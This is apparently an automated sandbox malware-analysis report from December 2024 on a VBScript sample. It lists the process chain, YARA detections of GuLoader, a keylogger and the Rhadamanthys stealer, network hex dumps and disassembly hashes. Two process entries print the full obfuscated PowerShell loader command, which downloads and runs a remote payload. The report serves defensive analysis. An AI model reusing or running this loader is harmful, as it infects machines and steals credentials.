                                                                                  Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                  Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
                                                                                  Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:06:47:17
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs"
                                                                                  Imagebase:0x7ff6b0060000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:06:47:21
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic diskdrive get caption,serialnumber
                                                                                  Imagebase:0x7ff73cea0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:06:47:21
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:06:47:23
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL jS.e nKii vnSugInsPaaO a r') ;Impalement $Nonappreciative;Impalement (Resubmerging 'UnsSctUnAtoRAaTC -Sas NLKreNoECapTe C4');Impalement (Resubmerging ' F$OvgS.lNoo lBPaaA lT,:RosUnTInoO.s,rnbeiRenAggemE ,N .S e=Te(unt EeceSInTKe-ChPArASaT Sh K M $T sOvOprk l.vESkTSkTC EAnnTo7 V6La)') ;Impalement (Resubmerging 'Le$a GE lSeONdB a,tL k:GooPrU rt,uTBeiBer PismN DgRe=Lo$.mg rlS,oSoB raSuLVe:StM e RDrcVih taIbNKoDSkr TYAt+ a+,e% A$TegC.a S et Mrfuo yMR EgrN KI aHa..ncCeoInuReNSkt') ;$morbidise=$gastromenia[$Outtiring]}$Bortfaldes50=318066;$Rulle=26987;Impalement (Resubmerging 'fe$ ,g l Mo Ub ,AanLPa:E.tbeES,NPeUNiTVeODysAn .b= .ig SE TtTo-a CL,OOiNSct.eEManMeT o Li$DesBrOKikP LCrEKat HtInEKeNCh7M,6');Impalement (Resubmerging 'H $TagStl PoFibCoa.bltu: tRWieBnaKal MkFirFoeExdToiAatWo Di=Ex O,[UnSG y UsC tR eApmSc.InCS o unB vFoeGlrT,tPi]We:Pr:BeF Kr.eoD m mB Ha TsS eSk6 S4 TSVetInrviiAfnAugSi(M,$EsTKoeS.n PuLatLaoG sCo)');Impalement (Resubmerging ' E$ nGMclP,OC.bHoALilPo:AnpHeRPoOVig KRPlATrMApUInDH,f ,R lESoLU.SB E N P= n i[S SJuYstsUnT eE oMC,.SuTPeeChX vTSk.HaeInNH,cbeoKadCoiPlNGoGVe]I.:Ny: mA.psL CEmIBii r. sG eTitK sg.T yRh I N gRe(By$MaR.oeQuA iL mKDerUnesaD Ri rT s)');Impalement (Resubmerging 'Ik$UdG Sl OoFoB eA,klHa:I,nAgODinFoGSiaE.sHeShyYFa=Bl$BupMorGuo .gPur SaKomT.U,aDS.fFlRBaelgLAmSS eJondo.m S .uDibPaSVeT r iiM nVegbu(Mo$Wobreo DrPrtBofP.A SLFrdC eTysye5Fo0Mi,De$,urRdUs L TLScE.r)');Impalement $Nongassy;"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:06:47:23
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:06:47:40
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL jS.e nKii vnSugInsPaaO a r') ;Impalement $Nonappreciative;Impalement (Resubmerging 'UnsSctUnAtoRAaTC -Sas NLKreNoECapTe C4');Impalement (Resubmerging ' F$OvgS.lNoo lBPaaA lT,:RosUnTInoO.s,rnbeiRenAggemE ,N .S e=Te(unt EeceSInTKe-ChPArASaT Sh K M $T sOvOprk l.vESkTSkTC EAnnTo7 V6La)') ;Impalement (Resubmerging 'Le$a GE lSeONdB a,tL k:GooPrU rt,uTBeiBer PismN DgRe=Lo$.mg rlS,oSoB raSuLVe:StM e RDrcVih taIbNKoDSkr TYAt+ a+,e% A$TegC.a S et Mrfuo yMR EgrN KI aHa..ncCeoInuReNSkt') ;$morbidise=$gastromenia[$Outtiring]}$Bortfaldes50=318066;$Rulle=26987;Impalement (Resubmerging 'fe$ ,g l Mo Ub ,AanLPa:E.tbeES,NPeUNiTVeODysAn .b= .ig SE TtTo-a CL,OOiNSct.eEManMeT o Li$DesBrOKikP LCrEKat HtInEKeNCh7M,6');Impalement (Resubmerging 'H $TagStl PoFibCoa.bltu: tRWieBnaKal MkFirFoeExdToiAatWo Di=Ex O,[UnSG y UsC tR eApmSc.InCS o unB vFoeGlrT,tPi]We:Pr:BeF Kr.eoD m mB Ha TsS eSk6 S4 TSVetInrviiAfnAugSi(M,$EsTKoeS.n PuLatLaoG sCo)');Impalement (Resubmerging ' E$ nGMclP,OC.bHoALilPo:AnpHeRPoOVig KRPlATrMApUInDH,f ,R lESoLU.SB E N P= n i[S SJuYstsUnT eE oMC,.SuTPeeChX vTSk.HaeInNH,cbeoKadCoiPlNGoGVe]I.:Ny: mA.psL CEmIBii r. sG eTitK sg.T yRh I N gRe(By$MaR.oeQuA iL mKDerUnesaD Ri rT s)');Impalement (Resubmerging 'Ik$UdG Sl OoFoB eA,klHa:I,nAgODinFoGSiaE.sHeShyYFa=Bl$BupMorGuo .gPur SaKomT.U,aDS.fFlRBaelgLAmSS eJondo.m S .uDibPaSVeT r iiM nVegbu(Mo$Wobreo DrPrtBofP.A SLFrdC eTysye5Fo0Mi,De$,urRdUs L TLScE.r)');Impalement $Nongassy;"
                                                                                  Imagebase:0x880000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.2135088634.0000000008CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2135880774.0000000009729000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.2113268820.0000000005FDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:06:47:40
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:06:47:55
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                  Imagebase:0xf20000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.2192874424.0000000000100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:06:48:06
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                  Imagebase:0xc60000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2199773661.0000000005A50000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2199606583.0000000005830000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Executed Functions

                                                                                    Function 00007FFD9B9EB8D2 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: U
                                                                                    • API String ID: 0-3372436214
                                                                                    • Opcode ID: 3155a7e90c4e4ba6ea930b64161ecc394a4b97827f66e0918092cd3764cd269b
                                                                                    • Instruction ID: fc1faf6d933aef2e5e172ab1d05a9bb997ca6fc54b0afea78ef664fb4a96d7e4
                                                                                    • Opcode Fuzzy Hash: 3155a7e90c4e4ba6ea930b64161ecc394a4b97827f66e0918092cd3764cd269b
                                                                                    • Instruction Fuzzy Hash: F5E1F830A19A4E8FEBA8DF28C8A57F977D1FF54310F15426ED84EC7295CE749A408B81
                                                                                    Function 00007FFD9BAB87A5 Relevance: 1.5, Instructions: 1463COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1a5c6e0f48d8f557972d9a30fc71de466bce32c37c1f53797782776512a94196
                                                                                    • Instruction ID: d22bcf75169157ad9d0ea51e502beb5c5a481e7186b3b224faec8b8bf817d7a1
                                                                                    • Opcode Fuzzy Hash: 1a5c6e0f48d8f557972d9a30fc71de466bce32c37c1f53797782776512a94196
                                                                                    • Instruction Fuzzy Hash: 98A25632B0EA9A0FE7A5976C88652787BD1EF56220F0A01FEC06DC71E3DE59AC058741
                                                                                    Function 00007FFD9BABA4DA Relevance: .5, Instructions: 516COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5a36297083da5f8e31f0e68708ca30c8a98d0fdf94222ad8676eb13e49de8144
                                                                                    • Instruction ID: 591e01c54db349ae435b764b88ccf035986024c41c9ddd968b32f4c1d14d1554
                                                                                    • Opcode Fuzzy Hash: 5a36297083da5f8e31f0e68708ca30c8a98d0fdf94222ad8676eb13e49de8144
                                                                                    • Instruction Fuzzy Hash: 63023832A0EBDD0FE766976888651647BE1EF96220F0A00FED0ACC71E3DD596D45C742
                                                                                    Function 00007FFD9BAB9CCA Relevance: .5, Instructions: 501COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bf2bd863760490c9c2ed24c0121e1264568c66de038ac894251f0baccc723d3
                                                                                    • Instruction ID: 5a1a38c3ae04f5ffd2244eb6f8324456e3a160866114ac3815372ee304a9283a
                                                                                    • Opcode Fuzzy Hash: 0bf2bd863760490c9c2ed24c0121e1264568c66de038ac894251f0baccc723d3
                                                                                    • Instruction Fuzzy Hash: CAF12832B0EB990FE7A6976888651747BE1EF56220F1900FED0ACC71E3DE59AC45C742
                                                                                    Function 00007FFD9B9EAB26 Relevance: .5, Instructions: 476COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51006ff8852f59ced42240b2468aa1d78408e0bd3bba8f1bb83dc6a16b25edd1
                                                                                    • Instruction ID: a6c6dac121b97ac0fafd71d74651d83a6ab3f01ad6a642ca0affd22799c10bb2
                                                                                    • Opcode Fuzzy Hash: 51006ff8852f59ced42240b2468aa1d78408e0bd3bba8f1bb83dc6a16b25edd1
                                                                                    • Instruction Fuzzy Hash: E2F1B530A19A4E8FEBA8DF28C8557F937D1FF54310F04426EE84EC72A5DB349A458B81
                                                                                    Function 00007FFD9BAB528C Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: B_H
                                                                                    • API String ID: 0-493211873
                                                                                    • Opcode ID: 0980bd8f172748c1c8277bac2fe22fb4aa1fa47b400d2503e00b8a08a1df0683
